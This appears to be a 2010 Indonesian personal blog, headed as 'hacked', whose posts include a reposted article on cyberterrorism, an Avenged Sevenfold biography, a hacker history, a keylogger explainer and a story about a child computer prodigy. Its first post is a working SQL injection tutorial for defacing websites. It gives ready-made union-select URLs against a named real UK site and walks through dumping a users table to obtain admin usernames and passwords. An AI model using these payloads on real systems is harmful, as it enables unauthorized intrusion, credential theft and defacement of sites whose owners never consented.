Hacked By Shinchan7Fold


Hacked By shinchan

== WELCOME ==

==> ☻☻ semua yang ada di dunia ini hanyalah milik tuhan jadi janganlah kalian bersombong diri dan menganggap rendah orang lain..... ☻☻<==
karena kita semua sama....
Berbagilah ilmu dengan siapapun,dimanapun,kapanpun....karena ilmu tidaklah berguna klo tidak di amalkan



Rabu, 02 Juni 2010

Deface Web With SQL injection


1. Cek Bug
target http://www.ymtltd.co.uk/new.php?id=11

qta tambah tnda petik satu (') di akhir angka jdi sprti ini

http://www.ymtltd.co.uk/new.php?id=11'

muncul pesan erornya,

2.Mencari nomor kolom
trus qta cari jmlah kolomnyanya pke perintah
+order+by+(jumlah angka)--

http://www.ymtltd.co.uk/new.php?id=11+order+by+3--
pesan error nya ngga da......
singkat cerita saya nemu pesan eror di angka 17,jdi angka yg ngga error sampe 16.....
http://www.ymtltd.co.uk/new.php?id=11+order+by+16-- < no error
http://www.ymtltd.co.uk/new.php?id=11+order+by+17-- < error

3.Menggunakan fungsi UNION
qta lanjut langkah buat nampilin angka" anehnya pke perintah
+union+all+(angka sblum angka eror)--

http://www.ymtltd.co.uk/new.php?id=-11+union+all+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16--


nnti kluar angka" misalnya angka 2 atau 4..

4. Melihat versi Mysql
pilih salah satu angka yg muncul trsebut untuk melihat versi sql nya dgn printah version() atau @@version
misalnya saia pilh angka 2.

http://www.ymtltd.co.uk/new.php?id=-11+union+all+select+1%2Cversion(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--

stelah terlihat versiny 5 lanjut langkah slanjutnya

5.Mencari table dan column
qta cari nama tablenya dgn perintah
group_concat(table_name)
ganti slah satu angka yg tmpil di layar monitornya.... trus di akhir stelah angka ditambain
+from+information_schema.tables+where+table_schema=database()
msal yg saya ganti angka 4 jdi sprti ini

http://www.ymtltd.co.uk/new.php?id=-11+union+all+select+1%2Cversion(),2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where+table_schema=database()--

nnti kluar nama" table, cri yg kmungkinan ada usernya..
disini saya ambil users trus table tdi di convert dlu ke bentuk hexa jdi seperti ini 7573657273

trus qta ganti
group_concat(table_name) jadi (column_name)
table_schema jadi table_name
database() diganti sama angka hexa tdi jgn lupa di tambah 0x di awal angka jdi hasil seperti ini

http://www.ymtltd.co.uk/new.php?id=-11+union+all+select+1%2Cversion(),3,group_concat(column_name),6,7,8,9,10,11,12,13,14,15,16+from+information_schema.columns+where+table_name=0x7573657273--

dah kluar qta tinggal liat isi column group_concat(column_name) ganti jdi concat_ws(0x3a,nama" isi column yg mu diliat) trus yg akhir jdi
+from+nama_column yg mau di liat isinya seperti ini

http://www.ymtltd.co.uk/new.php?id=-11+union+all+select+1%2Cversion(),3,concat_ws
(0x3a,id,username,password),6,7,8,9,10,11,12,13,14,15,16+from+users--

maka akan muncul tampilan data 1:admin:pass
udah gitu tinggal login deh ke halaman dngan username n password yg udah di dapet tadi..
semoga bermanfaat.

Selasa, 01 Juni 2010

TERORIS CYBER


Terorisme Cyber (2)
7 Ancaman Teroris Lewat Internet
Penulis: IGN Mantra - detikinet

Ilustrasi (Ist.)

Jakarta - Internet terbukti digunakan untuk berkoordinasi oleh komputer Al-Qaeda di Afghanistan. Itu baru satu hal yang dilakukan teroris di dunia cyber. Mau tahu ancaman lainnya yang siap mengintai?

Berikut beberapa hal mengenai apa saja yang bisa dilakukan kelompok teroris via internet:

1. Cyber Terorism (Terorisme Cyber)
Setelah 911, banyak hal yang dilakukan untuk serangan cyber terorisme secara besar-besaran oleh media internet yang tidak bisa dilakukan oleh media kertas. Menurut beberapa akademisi, kelompok-kelompok teroris menunda bertahun-tahun dan dengan adanya internet, mereka menggunakan internet seperti dirancang untuk menjadi sebuah sarana untuk berkomunikasi dan berkolaborasi, sehingga para teroris memiliki alasan kuat untuk tetap online.

Oleh karena itu yang ditakutkan saat ini adalah serangan besar-besaran di masa depan oleh cyber teroris untuk melumpuhkan obyek vital internet belum pernah terwujud, sedangkan Al-Qaeda mengambil keuntungan dari ketakutan ini.

2. Publisitas dan Propaganda
Seperti yang dinyatakan oleh peneliti terorisme Dr. Maura Conway bahwa 'Setiap mesin yang terhubung ke Internet berpotensi sebagai percetakan, stasiun siaran (broadcasting) atau tempat berkumpul (forum)'.

Internet merupakan sebuah suite media un-paralel. Teroris tidak lagi harus memiliki pesan-pesan tersebut apalagi di edit oleh media. Sebaliknya mereka (teroris) dapat dengan cepat menyebarkan informasi yang mereka pilih atau inginkan dan mereka kirim kemanapun dibelahan dunia ini.

Dalam berbagai kasus, para teroris berfokus pada keinginan mereka untuk membenarkan apa yang mereka lakukan dalam kegiatan teroris ini. Hal ini dapat dicapai dengan terbitnya berbagai artikel/email yang dikombinasikan dengan foto-foto dan dilengkapi juga dengan video dan file audio dimana artikel ini dibumbui hasutan untuk membela dan membenarkan tindakan mereka.

Sebagai contoh, artikel kekejaman terhadap warga sipil tanpa daya yang dilakukan oleh tentara Israel dan tentara Amerika terhadap warga sipil di Irak, dan lainnya. Sehingga cara ini dipilih oleh teroris untuk dapat menghasilkan dukungan internasional dalam hal terorisme.

Teroris memang memilih dan mendistribusikan informasi tindakan mereka walaupun tindakan mereka dapat dikatakan tidak umum/wajar. Seperti beberapa artikel menggambarkan kekerasan, seringkali dalam bentuk video dan gambar. Sebagai contoh sebuah situs menjadi pra-misi foto-foto yang dipublikasikan oleh Harimau Tamil, skuadron Tiger Air yang beberapa hari sebelumnya telah melakukan serangan udara yang sukses terhadap pemerintah Sri Lanka. Contoh yang lebih ekstrim lagi, distribusi pemenggalan wartawan Daniel Pearl oleh organisasi teroris 'Gerakan Nasional Untuk Pemulihan Kedaulatan Pakistan'.

3. Data Mining
Internet adalah sumber informasi yang sangat besar dan siapapun dapat memanfaatkan dan para teroris juga dapat menggunakannya. Menurut Menteri Pertahanan Donald Rumsfeld yang berbicara 15 Januari 2003, sebuah manual pelatihan Al-Qaeda di Afghanistan mengatakan kepada pembacanya bahwa 'Menggunakan sumber-sumber publik secara terbuka dan tanpa menggunakan cara-cara ilegal sangat mungkin untuk mengumpulkan 80% dari semua informasi yang diperlukan tentang musuh-musuh meraka'.

Internet memungkinkan akses kepada peta yang sangat rinci dan akurat, berbagai skema dan sumber data lainnya, yang memungkinkan teroris mengumpulkan informasi tersebut sebagai target yang sangat potensial. Lebih penting lagi, begitu data ini telah dikumpulkan, dikompilasi ke dalam satu buah 'volume' dan menjadi 'how' dan seolah-olah sebagai manual yang didistribusikan di antara organisasi teroris.

4. Pendanaan
Kelompok-kelompok teroris telah memanfaatkan secara penuh kemampuan internet untuk menciptakan dana, apakah dana tersebut sah atau bahkan sebaliknya. Metode utama teroris mencapai hal ini adalah dengan cara:
a. Menjual barang, barang yang secara langsung berkaitan dengan organisasi teroris seperti CD, DVD dan buku-buku organisasi tersebut.
b. Website dan email berbasis banding, yakni mengirim email ke simpatisan yang terdaftar dan tertarik pada situs web group tersebut, posting pesan di newsgroup/forum dan website mereka sendiri yang akan memberikan arah, bagaimana dan di mana sumbangan tersebut dapat didapat.
c. Deception, menggunakan amal yang tampaknya sah atau bisnis yang tidak diketahui para donaturnya dan kemudian mengarahkan dana tersebut untuk kegiatan teroris.
d. Aktivitas kriminal, yakni melakukan aktivitas tidak sah/kriminal untuk mendapatkan dana bagi kelompok teroris tersebut termasuk penipuan kartu kredit, broker online dan perjudian online.

5.Rekruitment
Pada bagian ini pada dasarnya terkait dengan propaganda, organisasi teroris dapat memantau pengguna yang menelusuri web mereka, menangkap profil mereka dan informasi tentang mereka dan bila dianggap mungkin sangat berguna untuk merekrut mereka dan menghubungi mereka. Proses perekrutan dimulai dari ketika pengguna internet mulai menyerap propaganda pada website-website yang sering dikunjungi dan menarik bagi mereka, misalnya sering dibahas tentang 'karismatik' gaya penyampaian yang disampaikan 'Osama Bin Laden' melalui pesan-pesan video.

Mungkin didorong oleh video ini, pengguna internet mencari jawaban atas pertanyaan yang diinginkan dan kemudian pergi mengunjungi ke internet chat-room dan forum-forum diskusi yang membahas ketidaktahuan mereka. Kemungkinan pengguna yang terlihat oleh perekrut yang selalu mengawasi melalui forum-forum diskusi dan mendorong mereka kepada tahapan diskusi tentang isu-isu agama dan diskusi tentang sentimen politik dan kemudian melibatkan mereka kepada diskusi terorisme dan akhirnya indoktrinasi pribadi dalam perekrutan mereka.

6. Komunikasi dan Jaringan
Kelompok-kelompok teroris baru-baru ini telah berubah dan memiliki hirarki yang jelas dalam organisasi dengan pemimpin yang ditunjuk, memiliki banyak pemimpin dan sel- sel pemimpin independen, sehingga pemimpin mereka dapat bersembunyi dengan aman. Internet memfasilitasi komunikasi antara sel-sel yang memungkin pertukaran informasi dan manual.

Internet juga membantu komunikasi internal didalam sel terutama dalam kaitannya dengan perencanaan serangan. Untuk menghindari dideteksi dan sebagai target oleh aparat keamanan, seringkali pesan dikirim oleh kelompok melalui email yang sangat populer seperti Hotmail dan Yahoo dan juga dapat dikirimkan dari tempat-tempat umum seperti perpustakaan dan internet cafe, kadang juga menggunakan chat-room untuk memfasilitasi kegiatan mereka.

Selain itu, steganografi dapat digunakan untuk menyembunyikan informasi yang ditanam dalam file grafis disalah-satu situs web tersebut. File grafis juga dapat digunakan untuk mengirim pesan yang sangat halus seperti membalik orientasi pistol grafis yang artinya dapat saja sebagai rencana tahap berikutnya dan kelanjutan sebuah operasi. Metode lainnya untuk menyembunyikan petunjuk dan pesan dengan menggunakan bahasa kode seperti email dalam terakhir 'Muhammad Atta' untuk para kelompok teroris lain yang melakukan serangan 911 dan dilaporkan telah terbaca: 'Semester ini dimulai 3 minggu lebih. Kami telah memperoleh 19 konfirmasi untuk studi di fakultas hukum, fakultas perencanaan perkotaan, fakultas seni rupa dan fakultas teknik'.

Hal ini diyakini serangan mengacu kepada empat sasaran, pesawat direncanakan untuk menyerang 'arsitektur' sebagai World Trade Center, 'seni' sebagai Pentagon, 'hukum' sebagai Capitol Hill dan 'politik' sebagai Gedung Putih.

Sebuah metode yang lebih aman dalam berkomunikasi dengan menggunakan 1 account anonymous (email publik) secara bersama-sama, dua teroris yang ingin berkomunikasi dengan membuka sekitar 30 email account anonim username dan password yang diketahui kedua belah pihak.

Untuk berkomunikasi, salah satu teroris membuat email berbasis web (web mail) dan bukan mengirimnya tetapi menyimpannya sebagai draft onile. Penerima kemudian 'log in' ke account ini, membacanya dan kemudian menghapus semua pesan ini. Keesokan harinya, sebuah account baru dibuat dan digunakan seperti sebelumnya dan seterusnya, hal ini sangat menyulitkan untuk menelusuri penggunanya (user account).

7. Disinformasi
Penggunaan disinformasi oleh kelompok-kelompok teroris sering digunakan untuk membangkitkan rasa takut dan panik kepada orang lain dengan mengirimkan berbagai ancaman ke korbannya seperti penayangan video eksekusi brutal, menciptakan serangan psikologis dsbnya melalui penggunaan ancaman cyberterorism.
Disinformasi juga dapat digunakan untuk mengalihkan perhatian dari serangan balik dengan merilis berbagai serangan tipuan sehingga pemerintah dan aparat penegak hukum sulit untuk melacak mereka. Namun langkah-langkah ini tidak sepenuhnya efektif karena berlapisnya sistem keamanan saat ini sebagai contoh, setelah menerima informasi tentang potensi serangan (CERT Alert), tingkat keamanan pada semua spektrum diseluruh negara meningkat dari hitam, abu-abu dan akhirnya menjadi putih atau bebas dari ancaman cyber terrorism.

Demikian ulasan sekilas tentang cyber terrorism yang merupakan salah satu alat bantu/kendaraan dan target para teroris melancarkan serangannya. Bayangkan sebuah negara mengalami aksi terorisme internet, semua aktivitas internet dan komputer berhenti, seluruh critical infrastructure mati, mesin ATM dan banking mati, online sistem penerbangan mati, bursa efek mati dan semua online transaction mati, pasti akan chaos negara tersebut.

Hal ini sepatutnya perlu dicermati oleh negara yang sudah mulai bergantung kepada internet dan transaksi online mengenai bagaimana mengantisipasinya.


(Selesai)...

*) Penulis adalah IGN Mantra, Analis Senior Keamanan Jaringan dan Pemantau Trafik Internet ID-SIRTII sekaligus Dosen Keamanan Jaringan dan Cybercrime.
( ash / ash )

Dapatkan berita daerah, gossip & olahraga diHandphone Nokia dengan mengaktifkan layanan Nokia Life Tools

Tetap update informasi di manapun dengan http://m.detik.com dari browser ponsel anda!

Minggu, 30 Mei 2010

AVENGED SEVENFOLD my musix



Band ini dibentuk pada tahun 1999 di Huntington Beach, California dengan anggota asli M. Shadows, Zacky Vengeance, The Rev dan Matt Wendt. M. Shadows memberi nama sebagai referensi untuk cerita Cain dan Abel dari Alkitab, meskipun bukan band agama. Setelah pembentukannya, masing-masing anggota band ini juga mengangkat nama samaran yang sudah nama panggilan dari mereka dari SMA. Sebelum merilis album debut mereka, band ini merekam dua demo pada tahun 1999 dan 2000. Album pertama mereka, Sounding the Seventh Trumpet, direkam ketika anggota band berumur delapan belas tahun dan di sekolah menengah. Ini pada awalnya dirilis pada label pertama mereka, Good Life Record pada tahun 2001. Setelah gitaris Synyster Gates bergabung dengan band, pada akhir 1999 ketika ia berusia 18 tahun di pengantar lagu "To End the Rapture" adalah rekaman ulang menampilkan elemen band penuh. Album ini kemudian dirilis ulang pada Hopeless Records pada tahun 2002.
Band ini mulai menerima pengakuan, tampil dengan band-band seperti Mushroomhead dan Shadows Fall dan bermain di Take Action Tour. Setelah menetap di keempat mereka bassis, Johnny Christ, mereka merilis Waking the Fallen di Hopeless Records pada bulan Agustus 2003. Band menerima profil di Billboard dan The Boston Globe, dan bermain di Vans Warped Tour. Pada tahun 2004, Avenged Sevenfold tur lagi di Vans Warped Tour dan merekam video untuk lagu "Unholy Confessions "yang masuk ke rotasi pada MTV2's Headbanger's Ball. Tak lama setelah merilis Waking the Fallen, Avenged Sevenfold meninggalkan Hopeless Records dan telah ditandatangani ke Warner Bros.

M. Shadows

Lead singer dari Avenged sevenfold sekaligus yang menemukan bandnya. M. Shdows adalah salah satu personil asli dari Avenged Sevenfold. Nama lengkapnya adalah Matthew Charles Sanders. Dia lahir pada tanggal 31 Juli tahun 1981. Dia mendapatkan nama panggungnya karena dia seorang yang “Darker” karakter, tapi kemudian dia tidak mau nama Matt menjadi bagian dari namanya jadi dia lebih suka untuk memutuskan menamai dirinya M. Shadows. Dia mempunyai pacar bernama Valery yang pernah bernyanyi bersama KoRn. Pernah ikut band bernama Succesful Failure. Bisa memainkan drum, gitar, dan piano.

Synyster Gates

Synyster Gates Collage/wallpaper Pictures, Images and Photos
Lahir 7 Juli tahun 1981 dengan nama lengkap Brian Elwin Haner Jr. Bergabung dengan Avenged Sevenfold pada tahun 2001. Mempunyai proyek sampingan bersama The Rev bernama Pinkly Smooth. Bersekolah di Ocean View High School. Dia mempunyai toko pakaian sendiri bernama Syn Gates Clothing. Dia juga telah memenangkan the Young Shredder Award dan the Guitarist of the Year Award. Synyster Gate juga disponsori oleh Gitar Schecter. Tatto pertamanya adalah nomor satu di jempolnya. Dia pernah menjadi tamu dan rekaman bersama dengan Good Charlotte di lagu The River. Synyster Gate juga mahir bermain piano. Dia dulu ke Musicians Institute di Hollywood California

Zacky Vengeance

Zacky Vengeance Pictures, Images and Photos
Nama lengkapnya adalah Zachary James Baker. Lahir tanggal 11 Desember 1981. Dia sudah bermain gitar sejak umur 13 tahun menggunakan tangan kiri. Mempunyai saudara bernama Matthew dan mempunyai saudara perempuan bernama Zina. Dia juga mempunyai toko pakaian sendiri seperti Synyster Gate bernama Zacky V Presents. Mempunyai anjing bernama Ichabod C. Vengeance. Disponsori oleh Gitar Schecter. Posisinya sebagai gitar Rythem di Avenged Sevenfold. Dia juga salah satu personil asli Aveged Sevenfold dan menemukannya bersama M. Shadows. Dialah yang membuat julukan atau singkatan A7X.

Johnny Christ MOHAWKKK!

Lahir pada tanggal 18 November tahun 1984 dengan nama lengkap Jonathan Lewis Seward. Personil termuda di Avenged Sevenfold. Dia tidak bersekolah di SMA yang sama dengan yang lain. Bertemu dengan mereka melalui kakak tertuanya. Johnny adalah Bassist ketiga untuk Avenged Sevenfold. Dia juga personil terpendek di band hanya 5′4″.CEBOL
The Reverend Tholomew Plague
the rev 3 Pictures, Images and Photos
Lahir pada tanggal 9 Februari tahun 1981 dengan nama lengkap James Owen Sullivan. Dia mendapatkan drum setnya sendiri pada umur 3 tahun. Dia juga pernah dikeluarkan dari Sekolah Katolik pada tahun ke-3. Mempunyai proyek sampingan bersama Synyster Gate bernama Pinkly Smooth, yang mana dia Lead Singernya dan dia juga bermain drum untuk band itu. The Rev juga yang menulis lagu baru Avenged Sevenfod berjudul A Little Piece of Heaven. Dia juga yang menemukan suara tertawa, nyanyian, dan teriakan di dalamnya. Saat dia masih remaja dia pernah terlihat berjalan-jalan menggunakan kimono berwarna cerah. Sekarang ia telah meninggal saat ditemui di rumahnya dan tak bernyawa. Ucapan dukacita pun mengalir deras dari para penggemarnya. Ini salah satu penyebab bahwa sampai sekarang Avenged Sevenfold tidak pernah tampil lagi.

Kematian The Rev

orang yg Pada tanggal 28 Desember 2009 drummer James"The Rev"Sullivan ditemukan meninggal di rumahnya pada umur 28 tahun. Hasi otopsi tidak dapat disimpulkan. Dalam penjelasan band,mereka menunjukan kesedihan mereka atas meninggalnya The Rev dan meminta untuk menghormati privasi keluarganya:
Hal ini dengan kesedihan besar dan berat hati bahwa kami memberitahu Anda dari "melewati hari ini Jimmy The Rev" Sullivan. Jimmy tidak hanya salah satu drumer terbaik di dunia, tetapi lebih penting lagi dia adalah teman terbaik kami dan saudara. Pikiran dan doa kami pergi ke keluarga Jimmy dan kami berharap bahwa Anda akan menghormati privasi mereka selama masa sulit.
http://www.avengedsevenfold.com/get-nightmare/
Website Resmi Avenged Sevenfold mempertunjukan pesan USING Keluarga & Song Sullivan Yang menyatakan kasih kepada penggemarnya Atas dukungan mereka:
"Kami ingin mengucapkan terima kasih kepada semua penggemar Jimmy untuk komentar tulus yang telah diposting - itu menyenangkan untuk mengetahui bahwa jenius dan kejenakaan yang dihargai dan bahwa ia dicintai begitu banyak hati kami yang rusak -. Dia terlalu muda untuk jatuh. Og saor agus pergi Deo (selamanya muda dan bebas) "
Di samping ITU komentar Tentang Sullivan kematian, Manajer band Larry Jacobson mengungkapkan bagaimana tokoh Sullivan adalah terhadap * Semua Baik. Jacobson berbaring dalam wawancara ITU:

Dia ekspresif. Dia akan memberitahu Anda bagaimana perasaannya tentang Anda - Anda tidak heran karena ia melingkarkan tangannya di sekitar Anda, "katanya," Dia tahu bagaimana cara memberitahu teman-temannya ia mencintai mereka..
Selain Jacobson Ada 50 lebih artis musik kematian Yang mengomentari Tentang Pendeta
Pada tanggal 6 Januari 2010 jenazah di makamkan di lokasi yang dirahasiakan.
Tanggal 5 Januari 2010,majalah kerrang! menulis artikel tentang kematian The Rev.Zacky Vegeance menunjukan perasaan-nya tentang kematian The Rev
"Jimmy will always be with me in everything I do. Except sitting at home being sad, so today Im going to try to start living again. foREVer."

sejarah hacker



Peretas (Inggris: hacker) adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan.


Sejarah

Terminologi peretas muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata bahasa Inggris "hacker" pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik daripada yang telah dirancang bersama.

Kemudian pada tahun 1983, istilah hacker mulai berkonotasi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee, Amerika Serikat. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri sebagai peretas, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Peretas sejati menyebut orang-orang ini cracker dan tidak suka bergaul dengan mereka. Peretas sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Peretas sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi peretas.

Para peretas mengadakan pertemuan tahunan, yaitu setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan peretas terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas peretasan.

Peretas memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa peretaslah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode virus, dan lain-lain, padahal mereka adalah cracker. Cracker-lah menggunakan celah-celah keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya para peretas dipahami dibagi menjadi dua golongan: White Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah Black Hat Hackers.

White hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yang secara etis menunjukkan suatu kelemahan dalam sebuah sistem komputer. White hat secara umum lebih memfokuskan aksinya kepada bagaimana melindungi sebuah sistem, dimana bertentangan dengan black hat yang lebih memfokuskan aksinya kepada bagaimana menerobos sistem tersebut.

Black hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada para peretas yang menerobos keamanan sistem komputer tanpa izin, umumnya dengan maksud untuk mengakses komputer-komputer yang terkoneksi ke jaringan tersebut. Istilah cracker diajukan oleh Richard Stallman untuk mengacu kepada peretas dalam arti ini.
Diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka beroperasi dengan sejumlah komputer mainframe. Kata hacker pertama kali muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik dari yang telah dirancang bersama. Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri hacker, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini ‘cracker’ dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak
bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker.

Para hacker mengadakan pertemuan setiap setahun sekali yaitu diadakan setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan hacker terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas hacking.

KEYLOGER DAN PENANGKALNYA




Keylogger

Keylogger merupakan sebuah perangkat baik perangkat keras atau perangkat lunak yang digunakan untuk memantau penekanan tombol keyboard. Sebuah keylogger biasanya akan menyimpan hasil pemantauan penekanan tombol keyboard tersebut ke dalam sebuah berkas log/catatan/rekaman. Beberapa keylogger tertentu bahkan dapat mengirimkan hasil rekamannya ke e-mail tertentu secara periodik.

Keylogger dapat digunakan untuk kepentingan yang baik atau bahkan bisa digunakan untuk kepentingan yang jahat. Kepentingan yang baik antara lain untuk memantau produktivitas karyawan, untuk penegakan hukum dan pencarian bukti kejahatan. Kepentingan yang buruk antara lain pencurian data dan password.

Keylogger yang berupa hardware besarnya seukuran baterai ukuran AA. Keylogger jenis ini dipasangkan pada ujung keyboard, sehingga mencegat data yang dialirkan dari keyboard ke CPU. Sementara itu, keylogger dalam bentuk perangkat lunak terpasang di dalam komputer dan bekerja secara tersembunyi. Cara sederhana untuk menghindari dampak adanya keylogger pada sistem operasi Microsoft Windows adalah dengan menggunakan fitur on-screen keyboard (osk.exe).

on-screen keyboard,gambar

silahkan download anti keylogernya disini
http://www.anti-keyloggers.com/

Bikin proxy via tunneling,copy by jaticrew http://www.jatimcrew.org/index.php?dicolokanunya=news&mod=yes&jatimcrew=lihat&id=21

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Sabtu, 29 Mei 2010

kecil-kecil si cabe rawit




Kecil kecil cabe rawit. Itulah Marko Calasan, seorang anak berumur 9 tahun asal Macedonia yang memang bukan anak biasa karena akhirnya terjun ke dunia komputer di masa kecilnya dan membuat ia menjadi anak yang membanggakan.

Pada umur 6 tahun, Marko sudah didaulat menjadi seorang sistem administrator dari Microsoft dan bulan lalu, ia sudah mendapatkan sertifikat dari Microsoft sebagai sistem engineer termuda di dunia.


“Saya harus mengatakan dari sudut pandang teknologi, Marko adalah anak yang hebat.” kata Mate Potokar, general manager Microsoft Slovenia. Potokar berkata di dalam emailnya bahwa ia pertama kali mendengar tentang Marko sejak 2 tahun lalu dan sangat ingin mendapatkan kesempatan untuk bertemu anak muda berbakat itu.

19___marko_at_microsoft_edited_540x405

“Ketika kami diberitahu bahwa ia akan datang ke Ljubljana (ibukota Slovenia) dan kami sangat ingin bertemu dengan orang-orang dari Microsoft Slovenia, dimana aku berharap dapat bertemu dia,” kata Potokar. Selama setengah jam, Marko melakukan presentasi di depan Potokar dan timnya mengenai manfaat dari Active Directory.

“Sungguh hebat waktu yang dihabiskan dan dedikasinya mempelajari materi yang komplek dan luas itu. Di sisi lain, saya berharap…dia akan menemukan kecintaan terbesarnya yang kedua, yaitu sepakbola.”

Marko sudah mengawali dirinya menjadi seorang sistem administrator, bekerja secara remote mengelola jaringan komputer untuk sebuahyayasan nirlaba yang bekerja dengan orang-orang cacat.

“Para karyawan…sangat senang bahwa ada administrator yang baik,” kata Marko melalui e-mail. “Saya pikir bahwa hal itu benar, ya siapa yang tau.”

Marko berkata bahwa ia biasanya menghabiskan waktunya sekitar 4 jam di depan komputer, tetapi kadang-kadang bahkan lebih dari 10 jam. Selain itu Marko juga adalah seorang guru di lab komputer miliknya sendiri, dimana ia mengajar anak-anak berumur 8 – 11 tahun tentang dasar-dasar komputer.

Di dalam lab tersebut terdapat sekitar 15 komputer yang disediakan oleh departemen pendidikan. Ternyata bakat anak tak jauh-jauh dari bakat yang dimiliki orang tua. Terbukti dari ayah Marko sendiri adalah seorang IT manager.

Untuk memberikan Marko waktu yang banyak di depan komputer, pemerintahan memberikan izin kepadanya untuk jarang bersekolah. Kadang-kadang ia hanya datang beberapa kali saja dalam sebulan. Dan dia sendiri memiliki kunci dari lab-nya sehingga bebas untuk bereksperimen.

“Kadang-kadang ketika teman-teman seumurannya tidur, saya sedang bekerja di lab saya,” kata Marko. Ia sendiri tak menghabiskan waktu di depan komputer dengan bermain game, karena menurutnya itu bukanlah hal yang serius sehingga harus menghabiskan waktu di depan komputer dengan hanya main game saja.

Proyek terakhir yang sedang digarapnya kini adalah mencoba menemukan cara untuk mengirimkan siaran televisi HD ke jaringan yang relatif lambat. Untuk mendukung upayanya ini, sebuah perusahaan telekomunikasi asal Macedonia memberinya sambungan langsung ke jaringan utama kota.

Nah, anak-anak Indonesia juga tak boleh kalah dengan Marko, yang penting kita harus selalu semangat dan tak mudah menyerah dalam menggali ilmu pengetahuan. Toh, Marko bukanlah apa-apa kalau ia hanya berpangku tangan dan tak berusaha.